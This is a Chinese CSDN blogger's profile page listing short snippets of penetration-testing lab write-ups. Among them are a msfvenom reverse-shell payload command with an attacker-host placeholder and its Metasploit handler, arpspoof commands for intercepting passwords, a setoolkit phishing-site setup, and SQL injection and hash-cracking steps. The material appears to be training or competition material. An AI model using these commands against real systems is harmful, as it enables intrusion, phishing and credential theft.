.摘星
码龄4年
关注
提问 私信
  • 博客:22,612
    问答:89
    22,701
    总访问量
  • 8
    原创
  • 1,583,180
    排名
  • 11
    粉丝
  • 0
    铁粉

个人简介:ovo

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:吉林省
  • 加入CSDN时间: 2021-05-28
博客简介:

m0_58713554的博客

查看详细资料
个人成就
  • 获得12次点赞
  • 内容获得7次评论
  • 获得124次收藏
创作历程
  • 1篇
    2023年
  • 7篇
    2021年
成就勋章
创作活动更多

2024 博客之星年度评选报名已开启

博主的专属年度盛宴,一年仅有一次!MAC mini、大疆无人机、华为手表等精美奖品等你来拿!

去参加
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

Windows操作系统渗透测试

点击Tables 选择free small 点击install 选择root 找到自己的123文件点击OK。另外开启一个命令行远程连接 rdesktop ip -u 用户名 -p 密码。将得到的管理员的hash值,导入到ophcrack(彩虹表)进行破解。5.将系统最高权限管理员账户的密码作为Flag值提交。点击Load 点击Single hash 粘贴哈希值。Show options(查看配置参数)map -sV -sS 靶机ip。设置完毕后退出,开启远程桌面命令。点击OK 后点击Crack进行破。
原创
发布博客 2023.03.27 ·
594 阅读 ·
1 点赞 ·
0 评论 ·
4 收藏

kali制作钓鱼网站

设置攻击方Kali Linux主机的网络连接模式为桥接模式,如下图所示。 步骤:选择设置/选择网络适配器/选择桥接模式/选择确定选择图形化界面打开工具setoolkit(钓鱼网站部署工具),如下图所示。步骤:选择13-Social Engineering toolkit/选择social engineering toolkit工具/双击打开/初次进入需要输入y选择命令行界面打开工具setoolkit(钓鱼网站部署工具),如下图所示。 命令:setoolkit...
原创
发布博客 2021.12.27 ·
6844 阅读 ·
5 点赞 ·
2 评论 ·
49 收藏

kali基本常用命令

显示当前所在的路径 pwd进入某文件夹 cd 文件夹名kali桌面路径 /root/Desktop/ 桌面也是在某一个文件夹下返回上一级目录 cd+两个点 (cd与…之间有空格) cd / 则返回根目录新建文件 touch 文件名 touch a b 表示建立两个文件夹:a和b查看目录下的内容 ls 加 -l 参数可以显示内容详细信息新建文件夹 ...
原创
发布博客 2021.12.27 ·
8038 阅读 ·
4 点赞 ·
0 评论 ·
44 收藏

web渗透测测试(sqlmap)

通过分析靶机JLS02页面信息,寻找漏洞页面,将WEB服务存在SQL注入漏洞的页面名称作为Flag提交 Flag:index2.php通过本地PC中的渗透测试平台KALI2020对靶机进行SQL注入攻击,获取靶机的数据库信息,将用来存放WEB服务的数据库名称作为FLAG提交先随便输入点什么 sqlmap这个地址sqlmap使用注入语句结果如下flag:webiu3. 通过本地PC中的渗透测试平台KALI2020对靶机进行SQL注入攻击,获取靶机的数据库信息,将用...
原创
发布博客 2021.12.24 ·
3392 阅读 ·
1 点赞 ·
1 评论 ·
8 收藏

Linux系统提权渗透测试

通过渗透测试平台对服务器场景CentOS5.5,使用nmap进行服务扫描渗透测试,并将扫描结果上数第6行的4个单词作为Flag(形式:单词1|单词2|单词3|单词4)提交Nmap -sV 扫描靶机服务Nmap -sV 扫描靶机服务Flag:PORT|STATE|SERVICE|VERSION通过渗透测试平台对服务器场景CentOS5.5,使用metaspolit进行远程超级管理员口令暴力破解(使用的渗透测试平台中的字典文件superdic.txt),并将破解结果Success:后面2个空
原创
发布博客 2021.12.22 ·
1945 阅读 ·
0 点赞 ·
0 评论 ·
9 收藏

Sql注入点攻击

访问WebServ2003服务器场景,"/"->" Display Uploaded's File Content",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;访问后利用万能用户名进入场景进入后查看网页源代码查看变量名Flag:name="filename"对该任务第一题页面注入点进行渗透测试,通过php://filter协议使当前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件:AppServ
原创
发布博客 2021.12.22 ·
1176 阅读 ·
1 点赞 ·
4 评论 ·
8 收藏

kali渗透远程连接

发布问题 2021.12.15 ·
1 回答

Metasploit(msf)木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击端ip LPORT=1234 -f exe > /root/新建文件的文件名.exe2 ls 查看是否创建出了该文件3 然后进入msfconsole进行监听4 use exploit/multi/handler 进入监听模式5 set PAYLOADset LHOST攻击机ipset LPORT 配置参数6 run 运行7 把刚...
原创
发布博客 2021.11.04 ·
348 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

欺骗攻击(密码劫持)

需要知道目标IP,目标网关,本机网卡,本机IP打开kali终端输入命令:echo1 >/proc/sys/net/ipv4/ip_forward使目标不断网cat /proc/sys/net/ipv4/ip_forward检查上述命令是否被执行,若返回1则说明已被执行arpspoof -i 本机网卡 -t 目标IP目标网关在本列中命令为:arpspoof -i eth0 -t 192.168.0.120 192.168.0.1另一个终端用来接收劫持(盗取的信息)
原创
发布博客 2021.11.04 ·
273 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏